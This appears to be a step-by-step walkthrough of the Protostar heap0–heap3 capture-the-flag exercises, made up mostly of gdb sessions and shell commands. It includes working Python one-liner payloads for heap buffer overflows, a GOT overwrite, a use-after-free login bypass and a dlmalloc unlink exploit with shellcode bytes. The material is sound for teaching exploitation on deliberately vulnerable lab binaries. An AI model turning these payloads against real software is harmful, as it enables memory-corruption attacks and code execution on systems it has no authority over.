Heap 0
$ cat heap0.c
$ file heap0
$ gdb heap0
(gdb) disassemble main
(gdb) p winner
(gdb) b *0x080484f2
(gdb) b *0x080484fd
(gdb) run AAAA
(gdb) x/20xw 0x804a008
(gdb) c
(gdb) x/20xw 0x804a008
(gdb) quit
$ ./heap0 `python -c 'from struct import pack; print "A"*(0x804a050-0x804a008) + pack("<I", 0x08048464)'`
Heap 1
$ cat heap1.c
$ file heap1
$ gdb heap1
(gdb) disassemble main
(gdb) p winner
(gdb) x/i 0x80483cc
(gdb) x/xw 0x8049774
(gdb) b *0x080484ce
(gdb) b *0x080484e8
(gdb) b *0x080484fd
(gdb) b *0x08048517
(gdb) b *0x08048538
(gdb) b *0x08048555
(gdb) b *0x08048561
(gdb) run AAAA BBBB
(gdb) i r eax
(gdb) c
(gdb) i r eax
(gdb) c
(gdb) i r eax
(gdb) c
(gdb) i r eax
(gdb) c
(gdb) x/16xw 0x804a008
(gdb) quit
$ ./heap1 `python -c 'from struct import pack; print "A"*(0x804a02c-0x804a018) + pack("<I", 0x08049774), pack("<I", 0x08048494)'`
Heap 2
$ cat heap2.c
$ file heap2
$ gdb heap2
(gdb) disassemble main
(gdb) b *0x08048942
(gdb) run
auth AAAA
(gdb) info proc map
(gdb) x/12xw 0x804c000
(gdb) p &auth->name
(gdb) p &auth->auth
(gdb) c
serviceAAAABBBBCCCCDDDD
(gdb) x/12xw 0x804c000
(gdb) x/xw &auth->auth
(gdb) c
login
Heap 3
$ cat heap3.c
$ file heap3
$ gdb heap3
(gdb) disassemble main
(gdb) b *0x080488c5
(gdb) p winner
(gdb) run A B C
(gdb) info proc map
(gdb) x/i 0x8048790
(gdb) x/xw 0x804b128
(gdb) x/32xw 0x804c000
(gdb) quit
$ ./heap3 `python -c 'from struct import pack; print "A"*4 + "\x68\x64\x88\x04\x08\xc3" + "A"*22 + pack("<I", 0xfffffffc)*2, "B"*4 + pack("<I", 0x0804b128-12) + pack("<I", 0x804c00c), "C"'`
Reference
https://exploit-exercises.com/protostar/